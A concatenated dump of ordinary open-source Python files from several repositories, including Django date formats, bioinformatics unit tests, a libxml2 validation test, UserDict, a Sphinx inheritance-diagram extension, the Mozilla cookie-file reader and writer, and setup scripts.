'%d/%m/%Y %H:%M:%S.%f', '%d/%m/%y %H:%M:%S.%f', '%Y/%m/%d %H:%M:%S.%f',
# '20/01/2009 15:23:35.000200', '20/01/09 15:23:35.000200', '2009/01/20 15:23:35.000200'
# With time in %H.%M:%S :
'%d-%m-%Y %H.%M:%S', '%d-%m-%y %H.%M:%S', # '20-01-2009 15.23:35', '20-01-09 15.23:35'
'%d/%m/%Y %H.%M:%S', '%d/%m/%y %H.%M:%S', # '20/01/2009 15.23:35', '20/01/09 15.23:35'
# '%d %b %Y %H.%M:%S', '%d %b %y %H.%M:%S', # '20 jan 2009 15.23:35', '20 jan 09 15.23:35'
# '%d %B %Y %H.%M:%S', '%d %B %y %H.%M:%S', # '20 januari 2009 15.23:35', '20 januari 2009 15.23:35'
# With time in %H.%M:%S.%f :
'%d-%m-%Y %H.%M:%S.%f', '%d-%m-%y %H.%M:%S.%f', # '20-01-2009 15.23:35.000200', '20-01-09 15.23:35.000200'
'%d/%m/%Y %H.%M:%S.%f', '%d/%m/%y %H.%M:%S.%f', # '20/01/2009 15.23:35.000200', '20/01/09 15.23:35.000200'
# With time in %H:%M :
'%d-%m-%Y %H:%M', '%d-%m-%y %H:%M', '%Y-%m-%d %H:%M', # '20-01-2009 15:23', '20-01-09 15:23', '2009-01-20 15:23'
'%d/%m/%Y %H:%M', '%d/%m/%y %H:%M', '%Y/%m/%d %H:%M', # '20/01/2009 15:23', '20/01/09 15:23', '2009/01/20 15:23'
# '%d %b %Y %H:%M', '%d %b %y %H:%M', # '20 jan 2009 15:23', '20 jan 09 15:23'
# '%d %B %Y %H:%M', '%d %B %y %H:%M', # '20 januari 2009 15:23', '20 januari 2009 15:23'
# With time in %H.%M :
'%d-%m-%Y %H.%M', '%d-%m-%y %H.%M', # '20-01-2009 15.23', '20-01-09 15.23'
'%d/%m/%Y %H.%M', '%d/%m/%y %H.%M', # '20/01/2009 15.23', '20/01/09 15.23'
# '%d %b %Y %H.%M', '%d %b %y %H.%M', # '20 jan 2009 15.23', '20 jan 09 15.23'
# '%d %B %Y %H.%M', '%d %B %y %H.%M', # '20 januari 2009 15.23', '20 januari 2009 15.23'
# Without time :
'%d-%m-%Y', '%d-%m-%y', '%Y-%m-%d', # '20-01-2009', '20-01-09', '2009-01-20'
'%d/%m/%Y', '%d/%m/%y', '%Y/%m/%d', # '20/01/2009', '20/01/09', '2009/01/20'
# '%d %b %Y', '%d %b %y', # '20 jan 2009', '20 jan 09'
# '%d %B %Y', '%d %B %y', # '20 januari 2009', '20 januari 2009'
]
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '.'
NUMBER_GROUPING = 3
|
peterwharrison/SWAMP
|
refs/heads/master
|
tests.py
|
1
|
import unittest
import SWAMP
class TestSequenceMasking(unittest.TestCase):
def test_read_branchcodes(self):
infile = 'example_dataset/branchcodes.txt'
branch_codes = SWAMP.read_branchcodes(infile)
# Branch codes come out like '5..7' -> (papio, colobus)
branch_a = branch_codes['5..7']
self.assertIn('papio', branch_a)
self.assertIn('colobus', branch_a)
# Single-species branch should have single-length array, e.g.
# '6..2' -> (human)
branch_b = branch_codes['6..2']
self.assertEqual(len(branch_b), 1)
def test_branch_error_check(self):
seq_file = 'example_dataset/data/44/44.phy'
seq_dict = SWAMP.read_phylip(seq_file)
branch_file = 'example_dataset/branchcodes.txt'
branch_codes = SWAMP.read_branchcodes(branch_file)
# No error raised when valid branch codes provided.
SWAMP.branch_error_check(branch_codes, seq_dict)
# Error is raised when branchcodes is not present
# (e.g. no file provided by user on command line)
with self.assertRaises(ValueError) as cm:
SWAMP.branch_error_check(None, seq_dict)
# Mess up one of the branch_codes, adding an unknown species
branch_codes['5..7'] += tuple(['gorilla'])
# Error is raised when species isn't found in seq_dict.
with self.assertRaises(ValueError) as cm:
SWAMP.branch_error_check(branch_codes, seq_dict)
def test_read_phylip(self):
infile = 'example_dataset/data/101/101.phy'
seq_dict = SWAMP.read_phylip(infile)
# read_phylip returns a dict
self.assertTrue(type(seq_dict) is dict)
# Dict contains 4 seqs
self.assertEqual(len(seq_dict.keys()), 4)
# Sequence length check.
self.assertEqual(len(seq_dict['pongo']), 1413)
# Try another file.
infile = 'example_dataset/data/44/44.phy'
seq_dict = SWAMP.read_phylip(infile)
self.assertEqual(len(seq_dict['pongo']), 1905)
def test_write_phylip(self):
infile = 'example_dataset/data/44/44.phy'
seq_dict = SWAMP.read_phylip(infile)
# Create some fake codons to mask.
codons_to_mask = {}
for i in range(2, 13):
codons_to_mask[i] = ['pongo', 'homo']
# Write file...
masked_dict = SWAMP.mask_codons(seq_dict, codons_to_mask)
SWAMP.print_masked_phyfile(infile, masked_dict)
# Read it back
masked_file = 'example_dataset/data/44/44_masked.phy'
new_masked_dict = SWAMP.read_phylip(masked_file)
pongo_seq = new_masked_dict['pongo']
human_seq = new_masked_dict['homo']
colobus_seq = new_masked_dict['colobus']
# Make sure we see the masked seqs
self.assertTrue(('NNN' * 10) in pongo_seq)
self.assertTrue(('NNN' * 10) in human_seq)
self.assertFalse(('NNN' * 10) in colobus_seq)
def test_sliding_window_scan(self):
infiles = ['example_dataset/data/44/44.phy']
threshold = 1
windowsize = 20
interscan = False
branch_file = 'example_dataset/branchcodes.txt'
branch_codes = SWAMP.read_branchcodes(branch_file)
# Run a sliding window scan on this single file.
SWAMP.sliding_window_scan(infiles, threshold, windowsize,
interscan, branch_codes)
# Check that the masked file exists and contains 'NNN's
masked_file = 'example_dataset/data/44/44_masked.phy'
masked_dict = SWAMP.read_phylip(masked_file)
pongo_seq = masked_dict['pongo']
self.assertTrue('NNN' in pongo_seq)
# Increase threshold, ensure NNNs are gone.
threshold = 10
SWAMP.sliding_window_scan(infiles, threshold, windowsize,
interscan, branch_codes)
masked_dict = SWAMP.read_phylip(masked_file)
pongo_seq = masked_dict['pongo']
self.assertFalse('NNN' in pongo_seq)
def test_read_rst(self):
# Extract branch information from rst file
infile = 'example_dataset/data/44/44.phy'
branches = SWAMP.read_rst(infile)
self.assertEqual(len(branches['5..7']), 6)
self.assertEqual(len(branches['5..6']), 0)
def test_interscan(self):
infile = 'example_dataset/data/44/44.phy'
threshold = 1
windowsize = 10
interscan = False
branch_file = 'example_dataset/branchcodes.txt'
branch_codes = SWAMP.read_branchcodes(branch_file)
# Mask without interscan... fewer masked codons
result = SWAMP.sliding_window_scan_file(infile, threshold, windowsize,
interscan, branch_codes)
self.assertEqual(result['masked_column_count'], 215)
# Mask with interscan... more masked codons
interscan = True
result = SWAMP.sliding_window_scan_file(infile, threshold, windowsize,
interscan, branch_codes)
self.assertEqual(result['masked_column_count'], 301)
if __name__ == '__main__':
unittest.main()
|
surfnzdotcom/cvsnt-fork
|
refs/heads/master
|
libxml/python/tests/validate.py
|
87
|
#!/usr/bin/python -u
import sys
import libxml2
# Memory debug specific
libxml2.debugMemory(1)
ctxt = libxml2.createFileParserCtxt("valid.xml")
ctxt.validate(1)
ctxt.parseDocument()
doc = ctxt.doc()
valid = ctxt.isValid()
if doc.name != "valid.xml":
print "doc.name failed"
sys.exit(1)
root = doc.children
if root.name != "doc":
print "root.name failed"
sys.exit(1)
if valid != 1:
print "validity chec failed"
sys.exit(1)
doc.freeDoc()
i = 1000
while i > 0:
ctxt = libxml2.createFileParserCtxt("valid.xml")
ctxt.validate(1)
ctxt.parseDocument()
doc = ctxt.doc()
valid = ctxt.isValid()
doc.freeDoc()
if valid != 1:
print "validity check failed"
sys.exit(1)
i = i - 1
#desactivate error messages from the validation
def noerr(ctx, str):
pass
libxml2.registerErrorHandler(noerr, None)
ctxt = libxml2.createFileParserCtxt("invalid.xml")
ctxt.validate(1)
ctxt.parseDocument()
doc = ctxt.doc()
valid = ctxt.isValid()
if doc.name != "invalid.xml":
print "doc.name failed"
sys.exit(1)
root = doc.children
if root.name != "doc":
print "root.name failed"
sys.exit(1)
if valid != 0:
print "validity chec failed"
sys.exit(1)
doc.freeDoc()
i = 1000
while i > 0:
ctxt = libxml2.createFileParserCtxt("invalid.xml")
ctxt.validate(1)
ctxt.parseDocument()
doc = ctxt.doc()
valid = ctxt.isValid()
doc.freeDoc()
if valid != 0:
print "validity check failed"
sys.exit(1)
i = i - 1
del ctxt
# Memory debug specific
libxml2.cleanupParser()
if libxml2.debugMemory(1) == 0:
print "OK"
else:
print "Memory leak %d bytes" % (libxml2.debugMemory(1))
libxml2.dumpMemory()
|
koson/MissionPlannerKMTI
|
refs/heads/master
|
Lib/UserDict.py
|
358
|
"""A more or less complete user-defined wrapper around dictionary objects."""
class UserDict:
def __init__(self, dict=None, **kwargs):
self.data = {}
if dict is not None:
self.update(dict)
if len(kwargs):
self.update(kwargs)
def __repr__(self): return repr(self.data)
def __cmp__(self, dict):
if isinstance(dict, UserDict):
return cmp(self.data, dict.data)
else:
return cmp(self.data, dict)
__hash__ = None # Avoid Py3k warning
def __len__(self): return len(self.data)
def __getitem__(self, key):
if key in self.data:
return self.data[key]
if hasattr(self.__class__, "__missing__"):
return self.__class__.__missing__(self, key)
raise KeyError(key)
def __setitem__(self, key, item): self.data[key] = item
def __delitem__(self, key): del self.data[key]
def clear(self): self.data.clear()
def copy(self):
if self.__class__ is UserDict:
return UserDict(self.data.copy())
import copy
data = self.data
try:
self.data = {}
c = copy.copy(self)
finally:
self.data = data
c.update(self)
return c
def keys(self): return self.data.keys()
def items(self): return self.data.items()
def iteritems(self): return self.data.iteritems()
def iterkeys(self): return self.data.iterkeys()
def itervalues(self): return self.data.itervalues()
def values(self): return self.data.values()
def has_key(self, key): return key in self.data
def update(self, dict=None, **kwargs):
if dict is None:
pass
elif isinstance(dict, UserDict):
self.data.update(dict.data)
elif isinstance(dict, type({})) or not hasattr(dict, 'items'):
self.data.update(dict)
else:
for k, v in dict.items():
self[k] = v
if len(kwargs):
self.data.update(kwargs)
def get(self, key, failobj=None):
if key not in self:
return failobj
return self[key]
def setdefault(self, key, failobj=None):
if key not in self:
self[key] = failobj
return self[key]
def pop(self, key, *args):
return self.data.pop(key, *args)
def popitem(self):
return self.data.popitem()
def __contains__(self, key):
return key in self.data
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
class IterableUserDict(UserDict):
def __iter__(self):
return iter(self.data)
import _abcoll
_abcoll.MutableMapping.register(IterableUserDict)
class DictMixin:
# Mixin defining all dictionary methods for classes that already have
# a minimum dictionary interface including getitem, setitem, delitem,
# and keys. Without knowledge of the subclass constructor, the mixin
# does not define __init__() or copy(). In addition to the four base
# methods, progressively more efficiency comes with defining
# __contains__(), __iter__(), and iteritems().
# second level definitions support higher levels
def __iter__(self):
for k in self.keys():
yield k
def has_key(self, key):
try:
self[key]
except KeyError:
return False
return True
def __contains__(self, key):
return self.has_key(key)
# third level takes advantage of second level definitions
def iteritems(self):
for k in self:
yield (k, self[k])
def iterkeys(self):
return self.__iter__()
# fourth level uses definitions from lower levels
def itervalues(self):
for _, v in self.iteritems():
yield v
def values(self):
return [v for _, v in self.iteritems()]
def items(self):
return list(self.iteritems())
def clear(self):
for key in self.keys():
del self[key]
def setdefault(self, key, default=None):
try:
return self[key]
except KeyError:
self[key] = default
return default
def pop(self, key, *args):
if len(args) > 1:
raise TypeError, "pop expected at most 2 arguments, got "\
+ repr(1 + len(args))
try:
value = self[key]
except KeyError:
if args:
return args[0]
raise
del self[key]
return value
def popitem(self):
try:
k, v = self.iteritems().next()
except StopIteration:
raise KeyError, 'container is empty'
del self[k]
return (k, v)
def update(self, other=None, **kwargs):
# Make progressively weaker assumptions about "other"
if other is None:
pass
elif hasattr(other, 'iteritems'): # iteritems saves memory and lookups
for k, v in other.iteritems():
self[k] = v
elif hasattr(other, 'keys'):
for k in other.keys():
self[k] = other[k]
else:
for k, v in other:
self[k] = v
if kwargs:
self.update(kwargs)
def get(self, key, default=None):
try:
return self[key]
except KeyError:
return default
def __repr__(self):
return repr(dict(self.iteritems()))
def __cmp__(self, other):
if other is None:
return 1
if isinstance(other, DictMixin):
other = dict(other.iteritems())
return cmp(dict(self.iteritems()), other)
def __len__(self):
return len(self.keys())
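# Illustrative sketch, not part of the stdlib module: as the comments above
# describe, DictMixin only requires the four primitives below; get(), items(),
# update(), pop() and the rest are derived from them. The class name is
# hypothetical and added purely as a usage example.
class _ExampleStore(DictMixin):
    """Minimal mapping backed by a plain dict."""
    def __init__(self):
        self._data = {}
    def __getitem__(self, key):
        return self._data[key]
    def __setitem__(self, key, value):
        self._data[key] = value
    def __delitem__(self, key):
        del self._data[key]
    def keys(self):
        return self._data.keys()
# Example: s = _ExampleStore(); s['a'] = 1; s.get('a') == 1; s.items() == [('a', 1)]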
|
cordery/django-countries-plus
|
refs/heads/master
|
countries_plus/middleware.py
|
1
|
import logging
from countries_plus.models import Country
logger = logging.getLogger(__name__)
class AddRequestCountryMiddleware(object):
def __init__(self, get_response=None):
self.get_response = get_response
def __call__(self, request):
country = Country.get_by_request(request)
if country:
request.country = country
else:
logger.warning('countries_plus: Could not retrieve country, not adding to request.')
return self.get_response(request)
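# Illustrative sketch, not part of the original module: the middleware is
# activated by listing its dotted path in the project settings; the exact
# settings layout below is an assumption, not taken from this repository.
# MIDDLEWARE = [
#     # ... Django's default middleware ...
#     'countries_plus.middleware.AddRequestCountryMiddleware',
# ]
# Once enabled, views can read request.country whenever Country.get_by_request()
# resolved a country for the incoming request.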
|
mnach/suds-py3k
|
refs/heads/master
|
setup.py
|
1
|
#!/usr/bin/python
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( jortel@redhat.com )
import sys
import suds
from setuptools import setup, find_packages
setup(
name="suds-py3k",
version=suds.__version__,
description="Lightweight SOAP client",
author="Jeff Ortel",
author_email="jortel@redhat.com",
maintainer="Jeff Ortel",
maintainer_email="jortel@redhat.com",
packages=find_packages(exclude=['tests']),
url="https://fedorahosted.org/suds",
)
|
cpcloud/PyTables
|
refs/heads/develop
|
doc/sphinxext/inheritance_diagram.py
|
98
|
"""
Defines a docutils directive for inserting inheritance diagrams.
Provide the directive with one or more classes or modules (separated
by whitespace). For modules, all of the classes in that module will
be used.
Example::
Given the following classes:
class A: pass
class B(A): pass
class C(A): pass
class D(B, C): pass
class E(B): pass
   .. inheritance-diagram:: D E
Produces a graph like the following:
A
/ \
B C
/ \ /
E D
The graph is inserted as a PNG+image map into HTML and a PDF in
LaTeX.
"""
import inspect
import os
import re
import subprocess
try:
from hashlib import md5
except ImportError:
from md5 import md5
from docutils.nodes import Body, Element
from docutils.parsers.rst import directives
from sphinx.roles import xfileref_role
def my_import(name):
"""Module importer - taken from the python documentation.
This function allows importing names with dots in them."""
mod = __import__(name)
components = name.split('.')
for comp in components[1:]:
mod = getattr(mod, comp)
return mod
class DotException(Exception):
pass
class InheritanceGraph(object):
"""
Given a list of classes, determines the set of classes that
they inherit from all the way to the root "object", and then
is able to generate a graphviz dot graph from them.
"""
def __init__(self, class_names, show_builtins=False):
"""
*class_names* is a list of child classes to show bases from.
If *show_builtins* is True, then Python builtins will be shown
in the graph.
"""
self.class_names = class_names
self.classes = self._import_classes(class_names)
self.all_classes = self._all_classes(self.classes)
if len(self.all_classes) == 0:
raise ValueError("No classes found for inheritance diagram")
self.show_builtins = show_builtins
py_sig_re = re.compile(r'''^([\w.]*\.)? # class names
(\w+) \s* $ # optionally arguments
''', re.VERBOSE)
def _import_class_or_module(self, name):
"""
Import a class using its fully-qualified *name*.
"""
try:
path, base = self.py_sig_re.match(name).groups()
except:
raise ValueError(
"Invalid class or module '%s' specified for inheritance diagram" % name)
fullname = (path or '') + base
path = (path and path.rstrip('.'))
if not path:
path = base
try:
module = __import__(path, None, None, [])
# We must do an import of the fully qualified name. Otherwise if a
# subpackage 'a.b' is requested where 'import a' does NOT provide
# 'a.b' automatically, then 'a.b' will not be found below. This
# second call will force the equivalent of 'import a.b' to happen
# after the top-level import above.
my_import(fullname)
except ImportError:
raise ValueError(
"Could not import class or module '%s' specified for inheritance diagram" % name)
try:
todoc = module
for comp in fullname.split('.')[1:]:
todoc = getattr(todoc, comp)
except AttributeError:
raise ValueError(
"Could not find class or module '%s' specified for inheritance diagram" % name)
# If a class, just return it
if inspect.isclass(todoc):
return [todoc]
elif inspect.ismodule(todoc):
classes = []
for cls in todoc.__dict__.values():
if inspect.isclass(cls) and cls.__module__ == todoc.__name__:
classes.append(cls)
return classes
raise ValueError(
"'%s' does not resolve to a class or module" % name)
def _import_classes(self, class_names):
"""
Import a list of classes.
"""
classes = []
for name in class_names:
classes.extend(self._import_class_or_module(name))
return classes
def _all_classes(self, classes):
"""
Return a list of all classes that are ancestors of *classes*.
"""
all_classes = {}
def recurse(cls):
all_classes[cls] = None
for c in cls.__bases__:
if c not in all_classes:
recurse(c)
for cls in classes:
recurse(cls)
return all_classes.keys()
def class_name(self, cls, parts=0):
"""
Given a class object, return a fully-qualified name. This
works for things I've tested in matplotlib so far, but may not
be completely general.
"""
module = cls.__module__
if module == '__builtin__':
fullname = cls.__name__
else:
fullname = "%s.%s" % (module, cls.__name__)
if parts == 0:
return fullname
name_parts = fullname.split('.')
return '.'.join(name_parts[-parts:])
def get_all_class_names(self):
"""
Get all of the class names involved in the graph.
"""
return [self.class_name(x) for x in self.all_classes]
# These are the default options for graphviz
default_graph_options = {
"rankdir": "LR",
"size": '"8.0, 12.0"'
}
default_node_options = {
"shape": "box",
"fontsize": 10,
"height": 0.25,
"fontname": "Vera Sans, DejaVu Sans, Liberation Sans, Arial, Helvetica, sans",
"style": '"setlinewidth(0.5)"'
}
default_edge_options = {
"arrowsize": 0.5,
"style": '"setlinewidth(0.5)"'
}
def _format_node_options(self, options):
return ','.join(["%s=%s" % x for x in options.items()])
def _format_graph_options(self, options):
return ''.join(["%s=%s;\n" % x for x in options.items()])
def generate_dot(self, fd, name, parts=0, urls={},
graph_options={}, node_options={},
edge_options={}):
"""
Generate a graphviz dot graph from the classes that
were passed in to __init__.
*fd* is a Python file-like object to write to.
*name* is the name of the graph
*urls* is a dictionary mapping class names to http urls
*graph_options*, *node_options*, *edge_options* are
dictionaries containing key/value pairs to pass on as graphviz
properties.
"""
g_options = self.default_graph_options.copy()
g_options.update(graph_options)
n_options = self.default_node_options.copy()
n_options.update(node_options)
e_options = self.default_edge_options.copy()
e_options.update(edge_options)
fd.write('digraph %s {\n' % name)
fd.write(self._format_graph_options(g_options))
for cls in self.all_classes:
if not self.show_builtins and cls in __builtins__.values():
continue
name = self.class_name(cls, parts)
# Write the node
this_node_options = n_options.copy()
url = urls.get(self.class_name(cls))
if url is not None:
this_node_options['URL'] = '"%s"' % url
fd.write(' "%s" [%s];\n' %
(name, self._format_node_options(this_node_options)))
# Write the edges
for base in cls.__bases__:
if not self.show_builtins and base in __builtins__.values():
continue
base_name = self.class_name(base, parts)
fd.write(' "%s" -> "%s" [%s];\n' %
(base_name, name,
self._format_node_options(e_options)))
fd.write('}\n')
def run_dot(self, args, name, parts=0, urls={},
graph_options={}, node_options={}, edge_options={}):
"""
Run graphviz 'dot' over this graph, returning whatever 'dot'
writes to stdout.
*args* will be passed along as commandline arguments.
*name* is the name of the graph
*urls* is a dictionary mapping class names to http urls
Raises DotException for any of the many os and
installation-related errors that may occur.
"""
try:
dot = subprocess.Popen(['dot'] + list(args),
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=True)
except OSError:
raise DotException("Could not execute 'dot'. Are you sure you have 'graphviz' installed?")
except ValueError:
raise DotException("'dot' called with invalid arguments")
except:
raise DotException("Unexpected error calling 'dot'")
self.generate_dot(dot.stdin, name, parts, urls, graph_options,
node_options, edge_options)
dot.stdin.close()
result = dot.stdout.read()
returncode = dot.wait()
if returncode != 0:
raise DotException("'dot' returned the errorcode %d" % returncode)
return result
class inheritance_diagram(Body, Element):
"""
A docutils node to use as a placeholder for the inheritance
diagram.
"""
pass
def inheritance_diagram_directive(name, arguments, options, content, lineno,
content_offset, block_text, state,
state_machine):
"""
Run when the inheritance_diagram directive is first encountered.
"""
node = inheritance_diagram()
class_names = arguments
# Create a graph starting with the list of classes
graph = InheritanceGraph(class_names)
# Create xref nodes for each target of the graph's image map and
# add them to the doc tree so that Sphinx can resolve the
# references to real URLs later. These nodes will eventually be
# removed from the doctree after we're done with them.
for name in graph.get_all_class_names():
refnodes, x = xfileref_role(
'class', ':class:`%s`' % name, name, 0, state)
node.extend(refnodes)
# Store the graph object so we can use it to generate the
# dot file later
node['graph'] = graph
# Store the original content for use as a hash
node['parts'] = options.get('parts', 0)
node['content'] = " ".join(class_names)
return [node]
def get_graph_hash(node):
return md5(node['content'] + str(node['parts'])).hexdigest()[-10:]
def html_output_graph(self, node):
"""
Output the graph for HTML. This will insert a PNG with clickable
image map.
"""
graph = node['graph']
parts = node['parts']
graph_hash = get_graph_hash(node)
name = "inheritance%s" % graph_hash
path = '_images'
dest_path = os.path.join(setup.app.builder.outdir, path)
if not os.path.exists(dest_path):
os.makedirs(dest_path)
png_path = os.path.join(dest_path, name + ".png")
path = setup.app.builder.imgpath
# Create a mapping from fully-qualified class names to URLs.
urls = {}
for child in node:
if child.get('refuri') is not None:
urls[child['reftitle']] = child.get('refuri')
elif child.get('refid') is not None:
urls[child['reftitle']] = '#' + child.get('refid')
# These arguments to dot will save a PNG file to disk and write
# an HTML image map to stdout.
image_map = graph.run_dot(['-Tpng', '-o%s' % png_path, '-Tcmapx'],
name, parts, urls)
return ('<img src="%s/%s.png" usemap="#%s" class="inheritance"/>%s' %
(path, name, name, image_map))
def latex_output_graph(self, node):
"""
Output the graph for LaTeX. This will insert a PDF.
"""
graph = node['graph']
parts = node['parts']
graph_hash = get_graph_hash(node)
name = "inheritance%s" % graph_hash
dest_path = os.path.abspath(os.path.join(setup.app.builder.outdir, '_images'))
if not os.path.exists(dest_path):
os.makedirs(dest_path)
pdf_path = os.path.abspath(os.path.join(dest_path, name + ".pdf"))
graph.run_dot(['-Tpdf', '-o%s' % pdf_path],
name, parts, graph_options={'size': '"6.0,6.0"'})
return '\n\\includegraphics{%s}\n\n' % pdf_path
def visit_inheritance_diagram(inner_func):
"""
This is just a wrapper around html/latex_output_graph to make it
easier to handle errors and insert warnings.
"""
def visitor(self, node):
try:
content = inner_func(self, node)
except DotException, e:
# Insert the exception as a warning in the document
warning = self.document.reporter.warning(str(e), line=node.line)
warning.parent = node
node.children = [warning]
else:
source = self.document.attributes['source']
self.body.append(content)
node.children = []
return visitor
def do_nothing(self, node):
pass
def setup(app):
setup.app = app
setup.confdir = app.confdir
app.add_node(
inheritance_diagram,
latex=(visit_inheritance_diagram(latex_output_graph), do_nothing),
html=(visit_inheritance_diagram(html_output_graph), do_nothing))
app.add_directive(
'inheritance-diagram', inheritance_diagram_directive,
False, (1, 100, 0), parts = directives.nonnegative_int)
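# Illustrative sketch, not part of the original extension: a typical way to
# enable this module from a Sphinx project's conf.py, assuming doc/sphinxext/
# has been added to sys.path there (the exact conf.py layout is an assumption).
#
#     sys.path.insert(0, os.path.abspath('sphinxext'))
#     extensions = ['inheritance_diagram']
#
# ReST sources can then request a diagram with:
#     .. inheritance-diagram:: some.module.SomeClass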
|
bob-white/UnityIronPythonConsole
|
refs/heads/master
|
Assets/IronPythonConsole/Plugins/Lib/_MozillaCookieJar.py
|
191
|
"""Mozilla / Netscape cookie loading / saving."""
import re, time
from cookielib import (_warn_unhandled_exception, FileCookieJar, LoadError,
Cookie, MISSING_FILENAME_TEXT)
class MozillaCookieJar(FileCookieJar):
"""
WARNING: you may want to backup your browser's cookies file if you use
this class to save cookies. I *think* it works, but there have been
bugs in the past!
This class differs from CookieJar only in the format it uses to save and
load cookies to and from a file. This class uses the Mozilla/Netscape
`cookies.txt' format. lynx uses this file format, too.
Don't expect cookies saved while the browser is running to be noticed by
the browser (in fact, Mozilla on unix will overwrite your saved cookies if
you change them on disk while it's running; on Windows, you probably can't
save at all while the browser is running).
Note that the Mozilla/Netscape format will downgrade RFC2965 cookies to
Netscape cookies on saving.
In particular, the cookie version and port number information is lost,
together with information about whether or not Path, Port and Discard were
specified by the Set-Cookie2 (or Set-Cookie) header, and whether or not the
domain as set in the HTTP header started with a dot (yes, I'm aware some
domains in Netscape files start with a dot and some don't -- trust me, you
really don't want to know any more about this).
Note that though Mozilla and Netscape use the same format, they use
slightly different headers. The class saves cookies using the Netscape
header by default (Mozilla can cope with that).
"""
magic_re = "#( Netscape)? HTTP Cookie File"
header = """\
# Netscape HTTP Cookie File
# http://www.netscape.com/newsref/std/cookie_spec.html
# This is a generated file! Do not edit.
"""
def _really_load(self, f, filename, ignore_discard, ignore_expires):
now = time.time()
magic = f.readline()
if not re.search(self.magic_re, magic):
f.close()
raise LoadError(
"%r does not look like a Netscape format cookies file" %
filename)
try:
while 1:
line = f.readline()
if line == "": break
# last field may be absent, so keep any trailing tab
if line.endswith("\n"): line = line[:-1]
# skip comments and blank lines XXX what is $ for?
if (line.strip().startswith(("#", "$")) or
line.strip() == ""):
continue
domain, domain_specified, path, secure, expires, name, value = \
line.split("\t")
secure = (secure == "TRUE")
domain_specified = (domain_specified == "TRUE")
if name == "":
# cookies.txt regards 'Set-Cookie: foo' as a cookie
# with no name, whereas cookielib regards it as a
# cookie with no value.
name = value
value = None
initial_dot = domain.startswith(".")
assert domain_specified == initial_dot
discard = False
if expires == "":
expires = None
discard = True
# assume path_specified is false
c = Cookie(0, name, value,
None, False,
domain, domain_specified, initial_dot,
path, False,
secure,
expires,
discard,
None,
None,
{})
if not ignore_discard and c.discard:
continue
if not ignore_expires and c.is_expired(now):
continue
self.set_cookie(c)
except IOError:
raise
except Exception:
_warn_unhandled_exception()
raise LoadError("invalid Netscape format cookies file %r: %r" %
(filename, line))
def save(self, filename=None, ignore_discard=False, ignore_expires=False):
if filename is None:
if self.filename is not None: filename = self.filename
else: raise ValueError(MISSING_FILENAME_TEXT)
f = open(filename, "w")
try:
f.write(self.header)
now = time.time()
for cookie in self:
if not ignore_discard and cookie.discard:
continue
if not ignore_expires and cookie.is_expired(now):
continue
if cookie.secure: secure = "TRUE"
else: secure = "FALSE"
if cookie.domain.startswith("."): initial_dot = "TRUE"
else: initial_dot = "FALSE"
if cookie.expires is not None:
expires = str(cookie.expires)
else:
expires = ""
if cookie.value is None:
# cookies.txt regards 'Set-Cookie: foo' as a cookie
# with no name, whereas cookielib regards it as a
# cookie with no value.
name = ""
value = cookie.name
else:
name = cookie.name
value = cookie.value
f.write(
"\t".join([cookie.domain, initial_dot, cookie.path,
secure, expires, name, value])+
"\n")
finally:
f.close()
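# Illustrative sketch, not part of the stdlib module (normally the class is
# imported via cookielib.MozillaCookieJar): a typical save/load round trip
# with a Netscape-format cookies.txt file. The function name, file name and
# URL below are hypothetical examples.
def _example_roundtrip(filename="cookies.txt"):
    import urllib2
    jar = MozillaCookieJar(filename)
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
    opener.open("http://example.com/")
    jar.save(ignore_discard=True, ignore_expires=True)
    jar.load(filename, ignore_discard=True, ignore_expires=True)
    return jar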
|
doudz/checkfeedmail
|
refs/heads/master
|
setup.py
|
1
|
# -*- coding: cp1252 -*-
## Copyright (c) 2007, Sébastien Ramage
##
## All rights reserved.
##
## Redistribution and use in source and binary forms, with or without modification,
## are permitted provided that the following conditions are met:
##
## * Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
##
## * Redistributions in binary form must reproduce the above copyright notice,
## this list of conditions and the following disclaimer in the documentation
## and/or other materials provided with the distribution.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
## PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
## LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
## NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
## SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from distutils.core import setup
import py2exe
import sys
import os
# If run without args, build executables, in quiet mode.
if len(sys.argv) == 1:
sys.argv.append("py2exe")
sys.argv.append("-q")
class Target:
def __init__(self, **kw):
self.__dict__.update(kw)
# for the versioninfo resources
self.version = "0.4.2"
self.company_name = "Sébastien Ramage"
self.copyright = "Sébastien Ramage 2007"
self.name = "checkfeedmail"
################################################################
# A program using wxPython
# The manifest will be inserted as resource into test_wx.exe. This
# gives the controls the Windows XP appearance (if run on XP ;-)
#
# Another option would be to store it in a file named
# test_wx.exe.manifest, and copy it with the data_files option into
# the dist-dir.
#
manifest_template = '''
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
